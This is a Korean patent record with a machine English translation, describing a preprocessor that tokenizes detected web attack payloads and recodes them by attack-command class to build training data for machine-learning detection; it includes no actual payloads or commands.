KR102103802B1

KR102103802B1 - Method for generating reconstructed payload data by extracting web attack pattern based on commands of machine learning target system and the preprocessor using the same

Info

Publication number: KR102103802B1
Application number: KR1020190090537A
Authority: KR
Inventors: 강필상; 신강식; 김진; 백만기; 임종혁; 김상현
Original assignee: (주)시큐레이어
Priority date: 2019-07-25
Filing date: 2019-07-25
Publication date: 2020-04-24

Abstract

Disclosed is a method of extracting a web attack pattern based on an instruction of a machine learning target system and generating reconstructed payload data comprising the steps of: (a) when payload data is obtained, performing, by a preprocessor, a process of talking to at least a part of characters, special characters, and numbers included in the payload data based on the special characters; (b) performing, by the preprocessor, a process of selecting a plurality of specific character groups each constituting a plurality of commands corresponding to a specific web attack type stored in a database; (c) performing, by the preprocessor, processes of (i) determining whether the plurality of specific character groups corresponds to each component constituting a specific command combination of the specific web attack type, and substituting each of the plurality of specific character groups with each specific first character representing each class corresponding thereto if the plurality of specific character groups correspond to each component constituting the specific command combination of the specific web attack type, and (ii) removing the plurality of specific character groups and the rest of the special characters from the payload data; and (d) performing, by the preprocessor, a process of substituting each specific first character and the special character with a real number or a second character corresponding to the real number to generate reconstructed payload data.

Description

Method for generating reconstruction payload data by extracting web attack pattern based on the instruction of the machine learning target system and the preprocessor using the same. PREPROCESSOR USING THE SAME}

본 발명은 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하는 방법 및 이를 사용한 전처리기에 대한 것이다.The present invention relates to a method for generating reconstruction payload data by extracting a web attack pattern based on a command of a machine learning target system and a preprocessor using the same.

기업 업무와 일상에서 웹이 차지하는 비중이 늘면서, 이를 노린 공격도 지속적으로 증가하고 있다.As the weight of the web in corporate work and daily life increases, the attacks aimed at it continue to increase.

따라서, 이와 같은 웹 공격에 대해 보다 효과적으로 대응하고자 정보보안 분야에서 기계학습(머신러닝)을 활용하고 있다. 이러한 활용사례는 한 인터넷 매체의 기사("보안과 머신러닝의 만남···대표적인 활용사례5가지", http://www.ciokorea.com/news/36657#csidx82bd9714929774882b9a2c72a9eb12c) 등에서 확인할 수 있다.Therefore, machine learning (machine learning) is being used in the field of information security to more effectively respond to such web attacks. This use case can be found in an article on an Internet medium ("5 representative use cases of security and machine learning ...", http://www.ciokorea.com/news/36657#csidx82bd9714929774882b9a2c72a9eb12c ).

다만, 이와 같은 웹 공격을 탐지하는 보안 위협 탐지 시스템에서 탐지되는 웹 공격 유형은 수백가지로 분류되는데, 수백가지의 웹 공격 유형을 분류하기는 사람도 어렵고 기계학습에게도 어려운 일이다. However, there are hundreds of types of web attacks that are detected in a security threat detection system that detects such web attacks, and it is difficult for humans and machine learning to classify hundreds of types of web attacks.

따라서, 기계학습이 웹 공격을 예측할 때 좋은 성능을 낼 수 있도록 보다 효율적으로 웹 공격의 유형을 분류하고 정확한 기계학습 데이터를 제공할 수 있는 방법이 필요한 실정이다.Therefore, there is a need for a method capable of classifying types of web attacks more efficiently and providing accurate machine learning data so that machine learning can perform well when predicting web attacks.

본 발명은 상술한 문제점을 모두 해결하는 것을 목적으로 한다.The present invention aims to solve all of the above-mentioned problems.

또한, 본 발명은, 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하는 방법을 제공함으로써, 웹 공격 유형 및 패턴대로 데이터를 가공할 수 있을 뿐만 아니라, 사람이 육안으로 보는 부분까지 기계가 직접 학습할 수 있도록 함으로서 효율적인 기계학습을 가능하게 하는 것을 다른 목적으로 한다.In addition, the present invention, by providing a method for generating a reconstructed payload data by extracting a web attack pattern based on the instructions of the machine learning target system, it is possible not only to process data according to the web attack type and pattern, but also a person Another object is to enable efficient machine learning by allowing the machine to directly learn even the part that is visible to the naked eye.

또한, 본 발명은, 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하는 방법을 제공함으로써, 웹 공격 유형들로부터 다양한 공격패턴의 특징을 추출하여 실제 악의적인 공격이 있는 정확한 위치를 파악해 기계학습의 퍼포먼스를 향상시키고, 기계 학습에 사용되는 학습 데이터의 질을 향상 시킬 수 있도록 하는 것을 또 다른 목적으로 한다.In addition, the present invention provides a method for extracting web attack patterns based on the instructions of the machine learning target system and generating reconstructed payload data, thereby extracting characteristics of various attack patterns from web attack types to actually perform malicious attacks. Another objective is to identify the exact location of the machine and improve the performance of machine learning and to improve the quality of the training data used for machine learning.

상기한 바와 같은 본 발명의 목적을 달성하고, 후술하는 본 발명의 특징적인 효과를 실현하기 위한 본 발명의 특징적인 구성은 다음과 같다.The characteristic configuration of the present invention for achieving the objects of the present invention as described above and for realizing the characteristic effects of the present invention described below is as follows.

본 발명의 일 태양에 따르면, 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하는 방법에 있어서, 기계학습 대상 시스템에 포함된 복수의 명령어 각각이 복수의 웹 공격 유형별로 명령어의 조합을 구성하는 각각의 구성요소에 따라 나뉘어진 복수의 클래스 - 상기 복수의 클래스 각각은 클래스별로 서로 다른 각각의 제1 문자로 정의되어 있음 - 중 적어도 하나에 속한 채로 데이터베이스에 저장되어 있는 상태에서, (a) 페이로드 데이터 - 상기 페이로드 데이터는 상기 보안 위협 탐지 시스템에 의해 탐지된 보안 위협 데이터에 포함되어 있고, 상기 보안 위협 데이터는 상기 복수의 웹 공격 유형 중 적어도 하나에 대응되는 특정 웹 공격 유형에 해당됨 - 가 획득되면, 전처리기가, 특수문자를 기준으로 상기 페이로드 데이터에 포함되어 있는 문자, 상기 특수문자 및 숫자 중 적어도 일부를 토크나이징하는 프로세스를 수행하는 단계; (b) 상기 전처리기가, 상기 토크나이징된 문자, 상기 토크나이징된 특수문자 및 상기 토크나이징된 숫자 중 상기 데이터베이스에 저장되어 있는 상기 특정 웹 공격 유형에 해당하는 복수의 명령어를 각각 구성하는 복수의 특정 문자 그룹을 선택하는 프로세스를 수행하는 단계; (c) 상기 전처리기가, (i) 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부를 판단하고, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되면, 상기 복수의 특정 문자 그룹 각각을 이에 해당되는 각각의 클래스를 나타내는 각각의 특정 제1 문자로 치환하고, (ii) 상기 토크나이징된 문자, 상기 토크나이징된 특수문자 및 상기 토크나이징된 숫자 중 상기 복수의 특정 문자 그룹 및 상기 특수문자를 제외한 나머지를 상기 페이로드 데이터에서 제거하는 프로세스를 수행하는 단계; 및 (d) 상기 전처리기가, 상기 각각의 특정 제1 문자 및 상기 특수문자를 실수 또는 상기 실수에 대응되는 제2 문자로 치환하여 재구성 페이로드 데이터를 생성하는 프로세스를 수행하는 단계;를 포함하는 방법이 개시된다.According to an aspect of the present invention, in a method of generating a reconstructed payload data by extracting a web attack pattern based on an instruction of a machine learning target system, each of a plurality of instructions included in the machine learning target system attacks a plurality of web attacks It is stored in the database as belonging to at least one of a plurality of classes divided according to each component constituting a combination of instructions for each type-each of the plurality of classes is defined as a different first character for each class- In the present state, (a) payload data-the payload data is included in security threat data detected by the security threat detection system, the security threat data corresponding to at least one of the plurality of web attack types Applicable to a specific web attack type-If is obtained, preprocessor, based on special characters The method comprising at least a part of the group of characters that are included in the payload data, wherein the special character numbers and performs a process for tokenizer Jing; (b) the preprocessor configures each of the plurality of commands corresponding to the specific web attack type stored in the database among the tokenized characters, the specialized characters, and the tokenized numbers. Performing a process of selecting a plurality of specific character groups; (c) the preprocessor determines whether (i) the plurality of specific character groups correspond to each component constituting a specific command combination of the specific web attack type, and the plurality of specific character groups are specified If each component constituting the specific command combination of the web attack type is replaced, each of the plurality of specific character groups is replaced with each specific first character representing each class corresponding thereto, and (ii) the talk Performing a process of removing, from the payload data, the rest of the plurality of specific character groups and the special characters among the aged characters, the tokenized special characters, and the tokenized numbers; And (d) the preprocessor performing a process of replacing each of the specific first characters and the special characters with a real number or a second character corresponding to the real number to generate reconstruction payload data. This is disclosed.

일례로서, 상기 (d) 단계 이후에, (e) 상기 전처리기가, 상기 생성된 재구성 페이로드 데이터가 기계학습장치에 입력되도록 지원하는 단계를 더 포함하는 것을 특징으로 하는 방법이 개시된다.As an example, after the step (d), a method characterized in that it further comprises the step of (e) supporting the preprocessor to input the generated reconstruction payload data into the machine learning apparatus.

일례로서, 상기 (c) 단계에서, 상기 전처리기가, (i) 상기 복수의 특정 문자 그룹 중 일부 특정 문자 그룹에 대해 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소 중 적어도 하나에 해당되는지 여부를 판단하고, 상기 일부 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소 중 적어도 하나에 해당되면, 상기 일부 특정 문자 그룹을 이에 해당되는 클래스를 나타내는 특정 제1-1 문자로 치환한 후, (ii) 상기 복수의 특정 문자 그룹 중 나머지 일부 특정 문자 그룹에 대해 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소 중 나머지에 해당되는지 여부를 판단하고, 상기 나머지 일부 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소 중 나머지에 해당되면, 상기 나머지 일부 특정 문자 그룹을 이에 해당되는 클래스를 나타내는 제1-2 문자로 치환하며, 상기 제1-1 문자 및 상기 제1-2 문자는 상기 특정 제1 문자에 포함되는 것을 특징으로 하는 방법이 개시된다.As an example, in step (c), the preprocessor, (i) at least one of each component constituting the specific command combination of the specific web attack type for some specific character group among the plurality of specific character groups It is determined whether or not, and if the specific group of characters corresponds to at least one of each component constituting the specific command combination of the specific web attack type, the specific group of characters represents a class corresponding thereto After substituting with a specific first-first character, (ii) whether it corresponds to the rest of each component constituting the specific command combination of the specific web attack type for some other specific character group among the plurality of specific character groups. Determine whether or not, and the rest of the specific character groups constitute the specific command combination of the specific web attack type If it corresponds to the rest of each component, the remaining part of the specific character group is replaced with 1-2 characters representing the corresponding class, and the 1-1 character and the 1-2 character are the specific agent Disclosed is a method characterized by being included in one character.

일례로서, 상기 (c) 단계에서, 상기 전처리기가, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부를 판단한 후, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되면, 상기 복수의 특정 문자 그룹 각각을 이에 해당되는 각각의 클래스를 나타내는 각각의 제1-1 문자 및 제1-2 문자로 치환하며, 상기 제1-1 문자 및 상기 제1-2 문자는 상기 특정 제1 문자에 포함되는 것을 특징으로 하는 방법이 개시된다.As an example, in step (c), after the preprocessor determines whether the plurality of specific character groups correspond to each component constituting the specific command combination of the specific web attack type, the plurality of specific If the character group corresponds to each component constituting the specific command combination of the specific web attack type, each of the first-first characters and first characters representing each class corresponding to each of the plurality of specific character groups. Disclosed is a method in which the first character and the 1-2 character are included in the specific first character.

일례로서, 상기 (c) 단계에서, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부는, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합에 대응되는 특정 복수의 클래스 중 적어도 두 개 이상의 클래스에 포함되는지 여부에 따라 결정되는 것을 특징으로 하는 방법이 개시된다.As an example, in step (c), whether the plurality of specific character groups correspond to each component constituting the specific command combination of the specific web attack type, the plurality of specific character groups are the specific web. Disclosed is a method characterized in that it is determined according to whether it is included in at least two or more of a specific plurality of classes corresponding to the specific instruction combination of the attack type.

일례로서, 상기 전처리기가, (i) 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합에 대응되는 상기 특정 복수의 클래스 중 적어도 두 개 이상의 클래스에 포함되면 해당 프로세스를 속행하고, (ii) 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합에 대응되는 상기 특정 복수의 클래스 중 적어도 두 개 이상의 클래스에 포함되지 않으면 해당 프로세스를 종료하는 것으로 특징으로 하는 방법이 개시된다. As an example, the preprocessor continues the process if (i) the plurality of specific character groups is included in at least two or more of the specific plurality of classes corresponding to the specific command combination of the specific web attack type, (ii) If the plurality of specific character groups is not included in at least two or more of the specific plurality of classes corresponding to the specific command combination of the specific web attack type, the method is disclosed. do.

일례로서, 상기 복수의 웹 공격 유형은 제1 내지 제n 웹 공격 유형을 포함하고, 제k 웹 공격 유형은 이에 속한 명령어의 조합을 구성하는 각각의 구성요소에 따라 나뉘어진, 상기 복수의 클래스 중 적어도 일부인 제1 클래스 내지 제n_k 클래스로 분류될 수 있는 명령어들에 대응되어 있으며, 상기 k 는 1 이상 n 이하의 정수인 것을 특징으로 하는 방법이 개시된다.As an example, the plurality of web attack types include the first to nth web attack types, and the k-th web attack type is divided among respective components constituting a combination of commands belonging to the plurality of classes. Corresponding to instructions that can be classified as at least a part of the first class to the n _k class, the method is disclosed, characterized in that k is an integer of 1 or more and n or less.

일례로서, 상기 특정 웹 공격 유형이 상기 제k 웹 공격 유형에 해당되면, 상기 전처리기가, 상기 (c) 단계에서, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부를 판단하고, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되면, 상기 복수의 특정 문자 그룹 각각을 이에 해당되는 상기 제1 클래스 내지 상기 제n_k 클래스를 나타내는 각각의 특정 제1-1 문자 내지 제1-n_k 문자로 치환하며, 상기 제1-1 문자 내지 제1-n_k 문자는 상기 특정 제1 문자에 포함되는 것을 특징으로 하는 방법이 개시된다.As an example, when the specific web attack type corresponds to the k-th web attack type, the preprocessor, in step (c), the plurality of specific character groups configure the specific command combination of the specific web attack type. It is determined whether it corresponds to each component, and if the plurality of specific character groups corresponds to each component constituting the specific command combination of the specific web attack type, each of the plurality of specific character groups corresponds to each component Is replaced with each specific first-first character to first-n- _k characters representing the first class to the n- _k class, and the first-first characters to the first-n- _k characters are the specific first Disclosed is a method characterized by being included in a letter.

일례로서, 상기 보안 위협 탐지 시스템은, 상기 탐지된 보안 위협 데이터에 포함된 복수의 탐지 로그 데이터를 수집하고, 상기 수집된 복수의 탐지 로그 데이터를 통해 상기 복수의 웹 공격 유형 중 상기 특정 웹 공격 유형인 것으로 결정하는 것을 특징으로 하는 방법이 개시된다.As an example, the security threat detection system collects a plurality of detection log data included in the detected security threat data, and the specific web attack type among the plurality of web attack types through the collected plurality of detection log data Disclosed is a method characterized in that it is determined to be.

일례로서, 상기 제1 문자는 실수 또는 실수로 치환될 수 있는 문자인 것을 특징으로 하는 방법이 개시된다.As an example, a method is disclosed wherein the first character is a character that can be replaced by a real number or a real number.

일례로서, 상기 제2 문자는 기계학습에 사용될 수 있는 문자인 것을 특징으로 하는 방법이 개시된다.As an example, a method is disclosed wherein the second character is a character that can be used for machine learning.

일례로서, 상기 제1 문자는 알파벳이고, 상기 제2 문자는 아스키 코드인 것을 특징으로 하는 방법이 개시된다.As an example, a method is disclosed, wherein the first character is an alphabet and the second character is an ASCII code.

본 발명의 다른 태양에 따르면, 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하는 전처리기에 있어서, 기계학습 대상 시스템에 포함된 복수의 명령어 각각이 복수의 웹 공격 유형별로 명령어의 조합을 구성하는 각각의 구성요소에 따라 나뉘어진 복수의 클래스 - 상기 복수의 클래스 각각은 클래스별로 서로 다른 각각의 제1 문자로 정의되어 있음 - 중 적어도 하나에 속한 채로 저장되어 있는 데이터베이스; 인스트럭션들을 저장하는 적어도 하나의 메모리; 및 상기 인스트럭션들을 실행하기 위해 구성된 적어도 하나의 프로세서를 포함하되, 상기 프로세서는, (1) 페이로드 데이터 - 상기 페이로드 데이터는 상기 보안 위협 탐지 시스템에 의해 탐지된 보안 위협 데이터에 포함되어 있고, 상기 보안 위협 데이터는 상기 복수의 웹 공격 유형 중 적어도 하나에 대응되는 특정 웹 공격 유형에 해당됨 - 가 획득되면, 특수문자를 기준으로 상기 페이로드 데이터에 포함되어 있는 문자, 상기 특수문자 및 숫자 중 적어도 일부를 토크나이징하는 프로세스, (2) 상기 토크나이징된 문자, 상기 토크나이징된 특수문자 및 상기 토크나이징된 숫자 중 상기 데이터베이스에 저장되어 있는 상기 특정 웹 공격 유형에 해당하는 복수의 명령어를 각각 구성하는 복수의 특정 문자 그룹을 선택하는 프로세스, (3) 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부를 판단하고, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되면, 상기 복수의 특정 문자 그룹 각각을 이에 해당되는 각각의 클래스를 나타내는 각각의 특정 제1 문자로 치환하고, 상기 토크나이징된 문자, 상기 토크나이징된 특수문자 및 상기 토크나이징된 숫자 중 상기 복수의 특정 문자 그룹 및 상기 특수문자를 제외한 나머지를 상기 페이로드 데이터에서 제거하는 프로세스 및 (4) 상기 각각의 특정 제1 문자 및 상기 특수문자를 실수 또는 상기 실수에 대응되는 제2 문자로 치환하여 재구성 페이로드 데이터를 생성하는 프로세스를 수행하는 것을 특징으로 하는 전처리기가 개시된다.According to another aspect of the present invention, in a preprocessor for generating reconstruction payload data by extracting a web attack pattern based on an instruction of a machine learning target system, each of a plurality of instructions included in the machine learning target system attacks a plurality of web attacks A database that is stored as belonging to at least one of a plurality of classes divided according to each component constituting a combination of instructions for each type-each of the plurality of classes is defined as a different first character for each class. ; At least one memory for storing instructions; And at least one processor configured to execute the instructions, wherein the processor comprises: (1) payload data-the payload data is included in security threat data detected by the security threat detection system, and Security threat data corresponds to a specific web attack type corresponding to at least one of the plurality of web attack types. When-is obtained, at least some of characters, special characters, and numbers included in the payload data based on special characters (2) a plurality of commands corresponding to the specific web attack type stored in the database among the talked characters, the talked special characters, and the talked numbers. The process of selecting a plurality of specific character groups, respectively, (3) the plurality of specific statements It is determined whether a rule group corresponds to each component constituting a specific command combination of the specific web attack type, and each configuration in which the plurality of specific character groups constitutes the specific command combination of the specific web attack type If it corresponds to an element, each of the plurality of specific character groups is replaced with each specific first character representing each class corresponding thereto, and the tokenized character, the tokenized special character, and the tokenizing A process of removing the plurality of specific character groups and the rest of the numbers other than the special characters from the payload data, and (4) each specific first character and the special character as a real number or a second corresponding to the real number. A preprocessor characterized by performing a process of generating reconstructed payload data by replacing with characters. It is.

일례로서, 상기 프로세서는, 상기 (4) 프로세스 이후에, (5) 상기 생성된 재구성 페이로드 데이터가 기계학습장치에 입력되도록 지원하는 프로세스를 더 수행하는 것을 특징으로 하는 전처리기가 개시된다.As an example, the processor is disclosed, after the process (4), further comprising: (5) further performing a process to support the generated reconstruction payload data to be input to the machine learning apparatus.

일례로서, 상기 프로세서는, 상기 (3) 프로세스에서, (i) 상기 복수의 특정 문자 그룹 중 일부 특정 문자 그룹에 대해 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소 중 적어도 하나에 해당되는지 여부를 판단하고, 상기 일부 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소 중 적어도 하나에 해당되면, 상기 일부 특정 문자 그룹을 이에 해당되는 클래스를 나타내는 특정 제1-1 문자로 치환한 후, (ii) 상기 복수의 특정 문자 그룹 중 나머지 일부 특정 문자 그룹에 대해 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소 중 나머지에 해당되는지 여부를 판단하고, 상기 나머지 일부 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소 중 나머지에 해당되면, 상기 나머지 일부 특정 문자 그룹을 이에 해당되는 클래스를 나타내는 제1-2 문자로 치환하며, 상기 제1-1 문자 및 상기 제1-2 문자는 상기 특정 제1 문자에 포함되는 것을 특징으로 하는 전처리기가 개시된다.As an example, the processor, in the (3) process, (i) at least one of each component constituting the specific instruction combination of the specific web attack type for some specific character group of the plurality of specific character groups It is determined whether or not, and if the specific group of characters corresponds to at least one of each component constituting the specific command combination of the specific web attack type, the specific group of characters represents a class corresponding thereto After substituting with a specific first-first character, (ii) whether it corresponds to the rest of each component constituting the specific command combination of the specific web attack type for some other specific character group among the plurality of specific character groups. Whether or not the rest of the specific character groups select the specific command combination of the specific web attack type. If it corresponds to the rest of each constituent element, the remaining part of the specific character group is replaced with 1-2 characters representing the corresponding class, and the 1-1 character and the 1-2 character are the specific characters. Disclosed is a preprocessor, characterized in that it is included in the first character.

일례로서, 상기 프로세서는, 상기 (3) 프로세스에서, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부를 판단한 후, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되면, 상기 복수의 특정 문자 그룹 각각을 이에 해당되는 각각의 클래스를 나타내는 각각의 제1-1 문자 및 제1-2 문자로 치환하며, 상기 제1-1 문자 및 상기 제1-2 문자는 상기 특정 제1 문자에 포함되는 것을 특징으로 하는 전처리기가 개시된다.As an example, the processor, in the (3) process, after determining whether the plurality of specific character group corresponds to each component constituting the specific command combination of the specific web attack type, the plurality of specific If the character group corresponds to each component constituting the specific command combination of the specific web attack type, each of the first-first characters and first characters representing each class corresponding to each of the plurality of specific character groups. Substituted by a -2 character, the pre-processor characterized in that the 1-1 character and the 1-2 character are included in the specific first character.

일례로서, 상기 (3) 프로세스에서, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부는, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합에 대응되는 특정 복수의 클래스 중 적어도 두 개 이상의 클래스에 포함되는지 여부에 따라 결정되는 것을 특징으로 하는 전처리기가 개시된다.As an example, in the process (3), whether the plurality of specific character groups correspond to each component constituting the specific command combination of the specific web attack type, the plurality of specific character groups are the specific web. Disclosed is a pre-processor characterized in that it is determined according to whether or not included in at least two or more of the specific plurality of classes corresponding to the specific combination of instructions of the attack type.

일례로서, 상기 프로세서는, (i) 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합에 대응되는 상기 특정 복수의 클래스 중 적어도 두 개 이상의 클래스에 포함되면 해당 프로세스를 속행하고, (ii) 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합에 대응되는 상기 특정 복수의 클래스 중 적어도 두 개 이상의 클래스에 포함되지 않으면 해당 프로세스를 종료하는 것으로 특징으로 하는 전처리기가 개시된다.As an example, the processor continues the process if (i) the plurality of specific character groups are included in at least two or more of the specific plurality of classes corresponding to the specific instruction combination of the specific web attack type, (ii) If the plurality of specific character groups is not included in at least two or more of the specific plurality of classes corresponding to the specific command combination of the specific web attack type, the preprocessor is initiated. do.

일례로서, 상기 복수의 웹 공격 유형은 제1 내지 제n 웹 공격 유형을 포함하고, 제k 웹 공격 유형은 이에 속한 명령어의 조합을 구성하는 각각의 구성요소에 따라 나뉘어진, 상기 복수의 클래스 중 적어도 일부인 제1 클래스 내지 제n_k 클래스로 분류될 수 있는 명령어들에 대응되어 있으며, 상기 k 는 1 이상 n 이하의 정수인 것을 특징으로 하는 전처리기가 개시된다.As an example, the plurality of web attack types include the first to nth web attack types, and the k-th web attack type is divided among respective components constituting a combination of commands belonging to the plurality of classes. Corresponding to instructions that can be classified as at least a part of the first class to the n _k class, the k is a preprocessor characterized in that the integer is 1 or more and n or less.

일례로서, 상기 특정 웹 공격 유형이 상기 제k 웹 공격 유형에 해당되면, 상기 프로세서는, 상기 (3) 프로세스에서, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되는지 여부를 판단하고, 상기 복수의 특정 문자 그룹이 상기 특정 웹 공격 유형의 상기 특정 명령어 조합을 구성하는 각각의 구성요소에 해당되면, 상기 복수의 특정 문자 그룹 각각을 이에 해당되는 상기 제1 클래스 내지 상기 제n_k 클래스를 나타내는 각각의 특정 제1-1 문자 내지 제1-n_k 문자로 치환하며, 상기 제1-1 문자 내지 제1-n_k 문자는 상기 특정 제1 문자에 포함되는 것을 특징으로 하는 전처리기가 개시된다.As an example, when the specific web attack type corresponds to the k-th web attack type, the processor, in the (3) process, the plurality of specific character groups constitute the specific command combination of the specific web attack type. It is determined whether it corresponds to each component, and if the plurality of specific character groups corresponds to each component constituting the specific command combination of the specific web attack type, each of the plurality of specific character groups corresponds to each component Is replaced with each specific first-first character to first-n- _k characters representing the first class to the n- _k class, and the first-first characters to the first-n- _k characters are the specific first Disclosed is a preprocessor, characterized in that it is included in the text.

일례로서, 상기 보안 위협 탐지 시스템은, 상기 탐지된 보안 위협 데이터에 포함된 복수의 탐지 로그 데이터를 수집하고, 상기 수집된 복수의 탐지 로그 데이터를 통해 상기 복수의 웹 공격 유형 중 상기 특정 웹 공격 유형인 것으로 결정하는 것을 특징으로 하는 전처리기가 개시된다.As an example, the security threat detection system collects a plurality of detection log data included in the detected security threat data, and the specific web attack type among the plurality of web attack types through the collected plurality of detection log data Disclosed is a preprocessor characterized in that it is determined to be.

일례로서, 상기 제1 문자는 실수 또는 실수로 치환될 수 있는 문자인 것을 특징으로 하는 전처리기가 개시된다.As an example, a preprocessor is disclosed, wherein the first character is a character that can be replaced by a real number or a real number.

일례로서, 상기 제2 문자는 기계학습에 사용될 수 있는 문자인 것을 특징으로 하는 전처리기가 개시된다.As an example, a preprocessor is disclosed, wherein the second character is a character that can be used for machine learning.

일례로서, 상기 제1 문자는 알파벳이고, 상기 제2 문자는 아스키 코드인 것을 특징으로 하는 전처리기가 개시된다.As an example, a preprocessor is disclosed, wherein the first character is an alphabet and the second character is an ASCII code.

본 발명에 의하면, 다음과 같은 효과가 있다.According to the present invention, there are the following effects.

본 발명은, 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하는 방법을 제공함으로써, 웹 공격 유형 및 패턴대로 데이터를 가공할 수 있을 뿐만 아니라, 사람이 육안으로 보는 부분까지 기계가 직접 학습할 수 있도록 함으로서 효율적인 기계학습을 가능하게 하는 효과가 있다.The present invention provides a method for generating reconstruction payload data by extracting a web attack pattern based on a command of a machine learning target system, and not only can process data according to the web attack type and pattern, but also can be viewed by a human eye. It has the effect of enabling efficient machine learning by allowing the machine to learn directly up to the viewing part.

또한, 본 발명은, 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하는 방법을 제공함으로써, 웹 공격 유형들로부터 다양한 공격패턴의 특징을 추출하여 실제 악의적인 공격이 있는 정확한 위치를 파악해 기계학습의 퍼포먼스를 향상시키고, 기계 학습에 사용되는 학습 데이터의 질을 향상시키는 효과가 있다.In addition, the present invention provides a method for extracting web attack patterns based on the instructions of the machine learning target system and generating reconstructed payload data, thereby extracting characteristics of various attack patterns from web attack types to actually perform malicious attacks. It has the effect of grasping the exact location and improving the performance of machine learning and improving the quality of the training data used for machine learning.

도 1은 보안 위협 탐지 시스템이 웹 공격을 탐지하여 탐지된 웹 공격에 대한 정보를 기계학습 시스템에 학습 데이터로 제공하는 기존 방법의 개략적인 구성을 설명하기 위한 예시를 나타내는 도면이다.
도 2는 본 발명의 일 실시예에 따른 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하는 전처리기의 개략적인 구성을 나타내는 도면이다.
도 3은 본 발명의 일 실시예에 따른 보안 위협 탐지 시스템이 웹 공격을 탐지하여 탐지된 웹 공격에 대한 정보를 기계학습 시스템에 학습 데이터로 제공하는 방법의 개략적인 구성을 설명하기 위한 예시를 나타내는 도면이다.
도 4는 기계학습 대상 시스템의 명령어를 기반으로 웹 공격 패턴을 추출하여 재구성 페이로드 데이터를 생성하는 방법의 개략적인 순서를 설명하기 위한 도면이다.FIG. 1 is a diagram illustrating an example of a schematic configuration of an existing method in which a security threat detection system detects a web attack and provides information about the detected web attack as learning data to a machine learning system.
FIG. 2 is a diagram showing a schematic configuration of a preprocessor for generating reconstruction payload data by extracting a web attack pattern based on an instruction of a machine learning target system according to an embodiment of the present invention.
3 is a security threat detection system according to an embodiment of the present invention, which detects a web attack and shows an example for explaining a schematic configuration of a method for providing information about a detected web attack as training data to a machine learning system It is a drawing.
FIG. 4 is a diagram illustrating a schematic procedure of a method of generating reconstruction payload data by extracting a web attack pattern based on a command of a machine learning target system.

